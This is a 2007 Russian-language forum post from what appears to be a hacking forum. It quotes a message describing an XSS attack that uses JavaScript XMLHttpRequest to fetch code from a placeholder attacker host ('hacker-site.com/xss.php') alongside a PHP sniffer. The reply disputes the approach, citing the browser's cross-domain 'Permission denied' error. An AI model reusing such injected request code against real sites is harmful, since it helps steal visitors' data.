16.06.2007, 18:15
|
|
Участник форума
Регистрация: 03.07.2006
Сообщений: 147
С нами:
10449962
Репутация:
66
|
|
Сообщение от Constantine
Интро
С другой стороны можно использовать обьект яваскрипт - XMLHTTPrequeset, в таком случае работает php снифер и сформированый xss вектор, который с поомощью XMLHTTPrequeset передает интересующую нас информацию об удаленном пользователе:
Код:
function HTTPRequest (url)
{
if (window.XMLHttpRequest) {
req = new XMLHttpRequest();
req.onreadystatechange = processReqChange;
req.open("GET", url, true);
req.send(null);
} else if (window.ActiveXObject) {
req = new ActiveXObject("Microsoft.XMLHTTP");
if (req) {
req.onreadystatechange = processReqChange;
req.open("GET", url, true);
req.send();
}
}
return (req.responseText);
}
var XSSCode = HTTPRequest ("http://hacker-site.com/xss.php");
А что уже можно с помощью XMLHttpRequest() делать запросы на "чужой" сайт? В смысле со страницы http://ya.ru c помощью этого объекта делать запросы на http://xacker.com?
uncaught exception: Permission denied to call method XMLHttpRequest.open
P.S. XSS вектор - какое-то странное определение...имхо
Последний раз редактировалось pento; 16.06.2007 в 18:25..
|
|
|